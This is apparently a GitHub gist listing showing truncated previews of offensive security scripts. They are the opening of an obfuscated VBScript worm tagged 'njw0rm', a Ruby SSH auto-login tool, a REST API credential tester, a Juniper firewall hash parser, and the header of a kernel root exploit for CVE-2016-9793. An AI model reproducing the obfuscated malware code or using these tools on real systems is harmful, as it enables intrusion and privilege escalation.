This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
on error resume next | |
dim puqjutqzym | |
'@njq8 | |
'#njw0rm | |
'<[ coded bY njq8 ]>' | |
On Error Resume Next | |
WScript.Timeout=0 | |
dim yxbuwnkdhx ' shell | |
set yxbuwnkdhx =WScript.CreateObject( chrw(118-31) & "S" & chrw(cint(49+50)) & "r" & chrw(cint(25 * 4.2)) & chrw(cint(4928 / 44)) & "t" & chrw(cint(36+10)) & "S" & chrw(cint(104)) & chrw(2727 / 27) & chrw(4.32 * 25) & "l" ) | |
dim dxlyfguatk ' filesystem |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require 'net/ssh' # more details: https://github.com/net-ssh/net-ssh | |
require 'logger' | |
if not ARGV[2] | |
puts "\n[Auto SSH login by Rick Flores (@nanotechz9l)]" | |
puts "Missing arguments. Correct useage below:\n" | |
puts "#{$0} ip user pass" | |
exit(0) | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require 'net/http'; require 'open-uri'; require 'base64'; require 'rainbow'; #require 'nokogiri' | |
# This script automatically tests a REST API web service with/without user credentials via user supplied input. | |
def banner() | |
print """ | |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
_____ ____ | |
<----,\ -- ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require '/root/Desktop/juniper_hash.rb';#require 'sugar' | |
# Parser script for Sweet tooth! | |
# DL juniper_hash.rb: https://github.com/sventantau/juniper_hash/blob/master/juniper_hash.rb | |
begin | |
unless ARGV.length == 1 | |
puts "Doh! - Missing arguments. A Juniper FW config file must be given as an ARGV! Correct usage below:"#.foreground(:yellow).bright | |
puts "\n#{$0} juniper_fw.conf\n"#.foreground(:white).bright | |
#exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// CAP_NET_ADMIN -> root LPE exploit for CVE-2016-9793 | |
// No KASLR, SMEP or SMAP bypass included | |
// Affected kernels: 3.11 -> 4.8 | |
// Tested in QEMU only | |
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793 | |
// | |
// Usage: | |
// # gcc -pthread exploit.c -o exploit | |
// # chown guest:guest exploit | |
// # setcap cap_net_admin+ep ./exploit |